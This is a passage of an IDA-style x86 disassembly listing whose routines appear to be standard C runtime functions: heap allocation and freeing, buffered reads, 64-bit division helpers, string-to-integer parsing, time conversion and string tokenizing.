sub_412FE4 proc near ; CODE XREF: sub_402717+74�p
; sub_40556E+CC�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00413040 SIZE 00000015 BYTES
push 0Ch
push offset stru_427700
call __SEH_prolog
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_41304F
cmp dword_47A640, 3
jnz short loc_413040
push 4
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41697A
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_413023
push esi
push eax
call sub_4169A5
pop ecx
pop ecx
loc_413023: ; CODE XREF: sub_412FE4+34�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413037
cmp [ebp+var_1C], 0
jnz short loc_41304F
push [ebp+arg_0]
jmp short loc_413041
sub_412FE4 endp
; =============== S U B R O U T I N E =======================================
sub_413037 proc near ; CODE XREF: sub_412FE4+43�p
; DATA XREF: .rdata:stru_427700�o
push 4
call sub_41686D
pop ecx
retn
sub_413037 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_412FE4
loc_413040: ; CODE XREF: sub_412FE4+1A�j
push esi
loc_413041: ; CODE XREF: sub_412FE4+51�j
push 0
push dword_47A63C
call ds:dword_41F134
loc_41304F: ; CODE XREF: sub_412FE4+11�j
; sub_412FE4+4C�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_412FE4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413055 proc near ; CODE XREF: sub_41313E+25�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_413079
xor eax, eax
jmp loc_413124
; ---------------------------------------------------------------------------
loc_413079: ; CODE XREF: sub_413055+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_41308D
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_413099
; ---------------------------------------------------------------------------
loc_41308D: ; CODE XREF: sub_413055+2E�j
mov [ebp+var_4], 1000h
jmp short loc_413099
; ---------------------------------------------------------------------------
loc_413096: ; CODE XREF: sub_413055+C5�j
mov ecx, [ebp+arg_0]
loc_413099: ; CODE XREF: sub_413055+36�j
; sub_413055+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_4130CB
mov eax, [esi+4]
test eax, eax
jz short loc_4130CB
cmp ecx, eax
mov edi, ecx
jb short loc_4130B0
mov edi, eax
loc_4130B0: ; CODE XREF: sub_413055+57�j
push edi
push dword ptr [esi]
push ebx
call sub_4177B0
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_413116
; ---------------------------------------------------------------------------
loc_4130CB: ; CODE XREF: sub_413055+4A�j
; sub_413055+51�j
cmp ecx, [ebp+var_4]
jb short loc_4130FE
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_4130E1
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_4130E1: ; CODE XREF: sub_413055+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_417703
add esp, 0Ch
test eax, eax
jz short loc_413128
cmp eax, 0FFFFFFFFh
jz short loc_413138
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_413116
; ---------------------------------------------------------------------------
loc_4130FE: ; CODE XREF: sub_413055+79�j
push esi
call sub_417455
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41312C
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_413116: ; CODE XREF: sub_413055+74�j
; sub_413055+A7�j
cmp [ebp+arg_0], 0
jnz loc_413096
mov eax, [ebp+arg_8]
loc_413123: ; CODE XREF: sub_413055+E1�j
pop esi
loc_413124: ; CODE XREF: sub_413055+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_413128: ; CODE XREF: sub_413055+9B�j
or dword ptr [esi+0Ch], 10h
loc_41312C: ; CODE XREF: sub_413055+B3�j
; sub_413055+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_413123
; ---------------------------------------------------------------------------
loc_413138: ; CODE XREF: sub_413055+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_41312C
sub_413055 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41313E proc near ; CODE XREF: sub_402A8B+47�p
; sub_410A22+2F2�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset stru_427710
call __SEH_prolog
push [ebp+arg_C]
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413055
add esp, 10h
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413180
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41313E endp
; =============== S U B R O U T I N E =======================================
sub_413180 proc near ; CODE XREF: sub_41313E+34�p
; DATA XREF: .rdata:stru_427710�o
push dword ptr [ebp+14h]
call sub_4166C5
pop ecx
retn
sub_413180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41318A proc near ; CODE XREF: sub_41965E+34�p
; sub_41965E+49�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 004132FB SIZE 0000003C BYTES
push 14h
push offset stru_427720
call __SEH_prolog
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jnz short loc_4131AD
push [ebp+arg_4]
call sub_41344D
pop ecx
jmp loc_413331
; ---------------------------------------------------------------------------
loc_4131AD: ; CODE XREF: sub_41318A+13�j
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_4131C0
push edi
call sub_412FE4
pop ecx
jmp loc_41332F
; ---------------------------------------------------------------------------
loc_4131C0: ; CODE XREF: sub_41318A+28�j
cmp dword_47A640, 3
jnz loc_4132FB
loc_4131CD: ; CODE XREF: sub_41318A+158�j
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja loc_4132CA
push 4
call sub_416901
pop ecx
mov [ebp+ms_exc.disabled], ebx
push edi
call sub_41697A
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_41329A
cmp esi, dword_47A62C
ja short loc_41324A
push esi
push edi
push eax
call sub_416E7A
add esp, 0Ch
test eax, eax
jz short loc_413212
mov [ebp+var_1C], edi
jmp short loc_41324A
; ---------------------------------------------------------------------------
loc_413212: ; CODE XREF: sub_41318A+81�j
push esi
call sub_417159
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_41324A
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_41322D
mov eax, esi
loc_41322D: ; CODE XREF: sub_41318A+9F�j
push eax
push edi
push [ebp+var_1C]
call sub_4177B0
push edi
call sub_41697A
mov [ebp+var_20], eax
push edi
push eax
call sub_4169A5
add esp, 18h
loc_41324A: ; CODE XREF: sub_41318A+72�j
; sub_41318A+86�j ...
cmp [ebp+var_1C], ebx
jnz short loc_41329A
cmp esi, ebx
jnz short loc_413259
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_413259: ; CODE XREF: sub_41318A+C7�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push dword_47A63C
call ds:dword_41F13C
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_41329A
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_413284
mov eax, esi
loc_413284: ; CODE XREF: sub_41318A+F6�j
push eax
push edi
push [ebp+var_1C]
call sub_4177B0
push edi
push [ebp+var_20]
call sub_4169A5
add esp, 14h
loc_41329A: ; CODE XREF: sub_41318A+66�j
; sub_41318A+C3�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4132F2
cmp [ebp+var_20], ebx
jnz short loc_4132CA
cmp esi, ebx
jnz short loc_4132AF
xor esi, esi
inc esi
loc_4132AF: ; CODE XREF: sub_41318A+120�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ebx
push dword_47A63C
call ds:dword_41F138
mov [ebp+var_1C], eax
loc_4132CA: ; CODE XREF: sub_41318A+49�j
; sub_41318A+11C�j
mov eax, [ebp+var_1C]
cmp eax, ebx
jnz short loc_413331
cmp dword_47A014, ebx
jz short loc_413331
push esi
call sub_417AED
pop ecx
test eax, eax
jnz loc_4131CD
jmp short loc_41332F
sub_41318A endp
; =============== S U B R O U T I N E =======================================
sub_4132EA proc near ; DATA XREF: .rdata:stru_427720�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_4132EA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4132F2 proc near ; CODE XREF: sub_41318A+114�p
push 4
call sub_41686D
pop ecx
retn
sub_4132F2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41318A
loc_4132FB: ; CODE XREF: sub_41318A+3D�j
; sub_41318A+1A3�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_413318
cmp esi, ebx
jnz short loc_413309
xor esi, esi
inc esi
loc_413309: ; CODE XREF: sub_41318A+17A�j
push esi
push edi
push ebx
push dword_47A63C
call ds:dword_41F138
loc_413318: ; CODE XREF: sub_41318A+176�j
cmp eax, ebx
jnz short loc_413331
cmp dword_47A014, ebx
jz short loc_413331
push esi
call sub_417AED
pop ecx
test eax, eax
jnz short loc_4132FB
loc_41332F: ; CODE XREF: sub_41318A+31�j
; sub_41318A+15E�j
xor eax, eax
loc_413331: ; CODE XREF: sub_41318A+1E�j
; sub_41318A+145�j ...
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41318A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413337 proc near ; CODE XREF: sub_413393+A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_427730
call __SEH_prolog
call sub_417CF5
mov [ebp+var_1C], eax
test eax, eax
jnz short loc_41335E
call sub_417C70
mov dword ptr [eax], 18h
xor eax, eax
jmp short loc_413383
; ---------------------------------------------------------------------------
loc_41335E: ; CODE XREF: sub_413337+16�j
and [ebp+ms_exc.disabled], 0
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417B08
add esp, 10h
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413389
mov eax, [ebp+var_20]
loc_413383: ; CODE XREF: sub_413337+25�j
call __SEH_epilog
retn
sub_413337 endp
; =============== S U B R O U T I N E =======================================
sub_413389 proc near ; CODE XREF: sub_413337+44�p
; DATA XREF: .rdata:stru_427730�o
push dword ptr [ebp-1Ch]
call sub_4166C5
pop ecx
retn
sub_413389 endp
; =============== S U B R O U T I N E =======================================
sub_413393 proc near ; CODE XREF: sub_402A8B+2A�p
; sub_4078FA+33EE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_413337
add esp, 0Ch
retn
sub_413393 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4133A6 proc near ; CODE XREF: sub_413421+B�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_427740
call __SEH_prolog
mov esi, [ebp+arg_0]
cmp dword_47A640, 3
jnz short loc_4133EC
cmp esi, dword_47A62C
ja short loc_4133EC
push 4
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_417159
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_413418
mov eax, [ebp+var_1C]
test eax, eax
jnz short loc_41340F
loc_4133EC: ; CODE XREF: sub_4133A6+16�j
; sub_4133A6+1E�j
test esi, esi
jnz short loc_4133F1
inc esi
loc_4133F1: ; CODE XREF: sub_4133A6+48�j
cmp dword_47A640, 1
jz short loc_413400
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_413400: ; CODE XREF: sub_4133A6+52�j
push esi
push 0
push dword_47A63C
call ds:dword_41F13C
loc_41340F: ; CODE XREF: sub_4133A6+44�j
call __SEH_epilog
retn
sub_4133A6 endp
; =============== S U B R O U T I N E =======================================
sub_413415 proc near ; DATA XREF: .rdata:stru_427740�o
mov esi, [ebp+8]
sub_413415 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_413418 proc near ; CODE XREF: sub_4133A6+3A�p
push 4
call sub_41686D
pop ecx
retn
sub_413418 endp
; =============== S U B R O U T I N E =======================================
sub_413421 proc near ; CODE XREF: sub_41344D+A�p
; sub_413A90+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_41344A
loc_413428: ; CODE XREF: sub_413421+27�j
push [esp+arg_0]
call sub_4133A6
test eax, eax
pop ecx
jnz short locret_41344C
cmp [esp+arg_4], eax
jz short locret_41344C
push [esp+arg_0]
call sub_417AED
test eax, eax
pop ecx
jnz short loc_413428
loc_41344A: ; CODE XREF: sub_413421+5�j
xor eax, eax
locret_41344C: ; CODE XREF: sub_413421+13�j
; sub_413421+19�j
retn
sub_413421 endp
; =============== S U B R O U T I N E =======================================
sub_41344D proc near ; CODE XREF: sub_402717+1E�p
; sub_406B55+5E�p ...
arg_0 = dword ptr 4
push dword_47A014
push [esp+4+arg_0]
call sub_413421
pop ecx
pop ecx
retn
sub_41344D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_413460 proc near ; CODE XREF: sub_413498�p
mov eax, offset sub_4181D9
mov off_42CE18, eax
mov off_42CE1C, offset sub_417E53
mov off_42CE20, offset sub_417EB8
mov off_42CE24, offset sub_417E17
mov off_42CE28, offset sub_417E9E
mov off_42CE2C, eax
retn
sub_413460 endp
; =============== S U B R O U T I N E =======================================
sub_413498 proc near ; CODE XREF: sub_4143FB+9�p
; DATA XREF: .data:off_42C718�o
call sub_413460
call sub_41827C
mov dword_479E54, eax
call sub_41822A
fnclex
retn
sub_413498 endp
; =============== S U B R O U T I N E =======================================
sub_4134AF proc near ; CODE XREF: sub_40241F+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_41F06C
cmp eax, 0FFFFFFFFh
jnz short loc_4134CF
call ds:dword_41F008
push eax
call sub_417C82
pop ecx
loc_4134CB: ; CODE XREF: sub_4134AF+41�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4134CF: ; CODE XREF: sub_4134AF+D�j
test al, 1
jz short loc_4134F2
test [esp+arg_4], 2
jz short loc_4134F2
call sub_417C70
mov dword ptr [eax], 0Dh
call sub_417C79
mov dword ptr [eax], 5
jmp short loc_4134CB
; ---------------------------------------------------------------------------
loc_4134F2: ; CODE XREF: sub_4134AF+22�j
; sub_4134AF+29�j
xor eax, eax
retn
sub_4134AF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413500 proc near ; CODE XREF: sub_402439+2A�p
; sub_414CA3+60D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_413531
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_413578
; ---------------------------------------------------------------------------
loc_413531: ; CODE XREF: sub_413500+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41353F: ; CODE XREF: sub_413500+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41353F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_41356D
cmp edx, [esp+4+arg_4]
ja short loc_41356D
jb short loc_413576
cmp eax, [esp+4+arg_0]
jbe short loc_413576
loc_41356D: ; CODE XREF: sub_413500+5D�j
; sub_413500+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_413576: ; CODE XREF: sub_413500+65�j
; sub_413500+6B�j
xor ebx, ebx
loc_413578: ; CODE XREF: sub_413500+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_413500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4135A0 proc near ; CODE XREF: sub_40253D+5F�p
; sub_40253D+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_4135C1
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_4135C1: ; CODE XREF: sub_4135A0+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_4135DD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_4135DD: ; CODE XREF: sub_4135A0+27�j
or eax, eax
jnz short loc_4135F9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41363A
; ---------------------------------------------------------------------------
loc_4135F9: ; CODE XREF: sub_4135A0+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_413607: ; CODE XREF: sub_4135A0+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_413607
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_413635
cmp edx, [esp+0Ch+arg_4]
ja short loc_413635
jb short loc_413636
cmp eax, [esp+0Ch+arg_0]
jbe short loc_413636
loc_413635: ; CODE XREF: sub_4135A0+85�j
; sub_4135A0+8B�j
dec esi
loc_413636: ; CODE XREF: sub_4135A0+8D�j
; sub_4135A0+93�j
xor edx, edx
mov eax, esi
loc_41363A: ; CODE XREF: sub_4135A0+57�j
dec edi
jnz short loc_413644
neg edx
neg eax
sbb edx, 0
loc_413644: ; CODE XREF: sub_4135A0+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_4135A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41364A proc near ; CODE XREF: sub_413809+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_415456
mov esi, [eax+64h]
cmp esi, off_42C7BC
jz short loc_413668
call sub_41628E
mov esi, eax
loc_413668: ; CODE XREF: sub_41364A+15�j
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
mov bl, [ecx]
lea edi, [ecx+1]
loc_413674: ; CODE XREF: sub_41364A+55�j
cmp dword ptr [esi+28h], 1
movzx eax, bl
jle short loc_41368E
push 8
push eax
push esi
call sub_41608B
mov ecx, [ebp+arg_0]
add esp, 0Ch
jmp short loc_413698
; ---------------------------------------------------------------------------
loc_41368E: ; CODE XREF: sub_41364A+31�j
mov edx, [esi+48h]
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_413698: ; CODE XREF: sub_41364A+42�j
test eax, eax
jz short loc_4136A1
mov bl, [edi]
inc edi
jmp short loc_413674
; ---------------------------------------------------------------------------
loc_4136A1: ; CODE XREF: sub_41364A+50�j
cmp bl, 2Dh
jnz short loc_4136AC
or [ebp+arg_C], 2
jmp short loc_4136B1
; ---------------------------------------------------------------------------
loc_4136AC: ; CODE XREF: sub_41364A+5A�j
cmp bl, 2Bh
jnz short loc_4136B4
loc_4136B1: ; CODE XREF: sub_41364A+60�j
mov bl, [edi]
inc edi
loc_4136B4: ; CODE XREF: sub_41364A+65�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_4137F9
cmp eax, 1
jz loc_4137F9
cmp eax, 24h
jg loc_4137F9
test eax, eax
push 10h
pop ecx
jnz short loc_4136FC
cmp bl, 30h
jz short loc_4136E6
mov [ebp+arg_8], 0Ah
jmp short loc_413714
; ---------------------------------------------------------------------------
loc_4136E6: ; CODE XREF: sub_41364A+91�j
mov al, [edi]
cmp al, 78h
jz short loc_4136F9
cmp al, 58h
jz short loc_4136F9
mov [ebp+arg_8], 8
jmp short loc_413714
; ---------------------------------------------------------------------------
loc_4136F9: ; CODE XREF: sub_41364A+A0�j
; sub_41364A+A4�j
mov [ebp+arg_8], ecx
loc_4136FC: ; CODE XREF: sub_41364A+8C�j
cmp [ebp+arg_8], ecx
jnz short loc_413714
cmp bl, 30h
jnz short loc_413714
mov al, [edi]
cmp al, 78h
jz short loc_413710
cmp al, 58h
jnz short loc_413714
loc_413710: ; CODE XREF: sub_41364A+C0�j
inc edi
mov bl, [edi]
inc edi
loc_413714: ; CODE XREF: sub_41364A+9A�j
; sub_41364A+AD�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
loc_41371C: ; CODE XREF: sub_41364A+134�j
mov esi, off_42CE30
movzx ecx, bl
mov cx, [esi+ecx*2]
test cl, 4
jz short loc_413736
movsx ecx, bl
sub ecx, 30h
jmp short loc_413755
; ---------------------------------------------------------------------------
loc_413736: ; CODE XREF: sub_41364A+E2�j
test cx, 103h
jz short loc_413780
cmp bl, 61h
jl short loc_41374F
cmp bl, 7Ah
jg short loc_41374F
movsx ecx, bl
sub ecx, 20h
jmp short loc_413752
; ---------------------------------------------------------------------------
loc_41374F: ; CODE XREF: sub_41364A+F6�j
; sub_41364A+FB�j
movsx ecx, bl
loc_413752: ; CODE XREF: sub_41364A+103�j
add ecx, 0FFFFFFC9h
loc_413755: ; CODE XREF: sub_41364A+EA�j
cmp ecx, [ebp+arg_8]
jnb short loc_413780
or [ebp+arg_C], 8
cmp [ebp+var_4], eax
jb short loc_41376F
jnz short loc_413769
cmp ecx, edx
jbe short loc_41376F
loc_413769: ; CODE XREF: sub_41364A+119�j
or [ebp+arg_C], 4
jmp short loc_41377B
; ---------------------------------------------------------------------------
loc_41376F: ; CODE XREF: sub_41364A+117�j
; sub_41364A+11D�j
mov esi, [ebp+var_4]
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_4], esi
loc_41377B: ; CODE XREF: sub_41364A+123�j
mov bl, [edi]
inc edi
jmp short loc_41371C
; ---------------------------------------------------------------------------
loc_413780: ; CODE XREF: sub_41364A+F1�j
; sub_41364A+10E�j
mov eax, [ebp+arg_C]
dec edi
test al, 8
jnz short loc_413797
cmp [ebp+arg_4], 0
jz short loc_413791
mov edi, [ebp+arg_0]
loc_413791: ; CODE XREF: sub_41364A+142�j
and [ebp+var_4], 0
jmp short loc_4137E2
; ---------------------------------------------------------------------------
loc_413797: ; CODE XREF: sub_41364A+13C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_4137BB
test al, 1
jnz short loc_4137E2
and eax, 2
jz short loc_4137B2
cmp [ebp+var_4], 80000000h
ja short loc_4137BB
loc_4137B2: ; CODE XREF: sub_41364A+15D�j
test eax, eax
jnz short loc_4137E2
cmp [ebp+var_4], esi
jbe short loc_4137E2
loc_4137BB: ; CODE XREF: sub_41364A+154�j
; sub_41364A+166�j
call sub_417C70
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_4137D2
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4137E2
; ---------------------------------------------------------------------------
loc_4137D2: ; CODE XREF: sub_41364A+180�j
mov al, byte ptr [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_4137E2: ; CODE XREF: sub_41364A+14B�j
; sub_41364A+158�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4137EB
mov [eax], edi
loc_4137EB: ; CODE XREF: sub_41364A+19D�j
test byte ptr [ebp+arg_C], 2
jz short loc_4137F4
neg [ebp+var_4]
loc_4137F4: ; CODE XREF: sub_41364A+1A5�j
mov eax, [ebp+var_4]
jmp short loc_413804
; ---------------------------------------------------------------------------
loc_4137F9: ; CODE XREF: sub_41364A+6F�j
; sub_41364A+78�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_413802
mov [eax], ecx
loc_413802: ; CODE XREF: sub_41364A+1B4�j
xor eax, eax
loc_413804: ; CODE XREF: sub_41364A+1AD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41364A endp
; =============== S U B R O U T I N E =======================================
sub_413809 proc near ; CODE XREF: sub_402B1D+440�p
; sub_4078FA+2787�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41364A
add esp, 10h
retn
sub_413809 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413820 proc near ; CODE XREF: sub_402B1D+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call ds:dword_41F140
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_414600
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_413857
mov [ecx], eax
locret_413857: ; CODE XREF: sub_413820+33�j
leave
retn
sub_413820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413859 proc near ; CODE XREF: sub_4030C4+2A�p
; sub_403B4C+FD�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_42CE38
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_4], eax
call sub_415456
push 8
pop ecx
mov [ebp+arg_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_413885: ; CODE XREF: sub_413859+45�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_413885
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4138B4
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
jmp short loc_4138B4
; ---------------------------------------------------------------------------
loc_4138AF: ; CODE XREF: sub_413859+72�j
test al, al
jz short loc_4138CD
inc edx
loc_4138B4: ; CODE XREF: sub_413859+4C�j
; sub_413859+54�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_4138AF
loc_4138CD: ; CODE XREF: sub_413859+58�j
mov ebx, edx
jmp short loc_4138E9
; ---------------------------------------------------------------------------
loc_4138D1: ; CODE XREF: sub_413859+93�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_4138F0
inc edx
loc_4138E9: ; CODE XREF: sub_413859+76�j
cmp byte ptr [edx], 0
jnz short loc_4138D1
jmp short loc_4138F4
; ---------------------------------------------------------------------------
loc_4138F0: ; CODE XREF: sub_413859+8D�j
and byte ptr [edx], 0
inc edx
loc_4138F4: ; CODE XREF: sub_413859+95�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
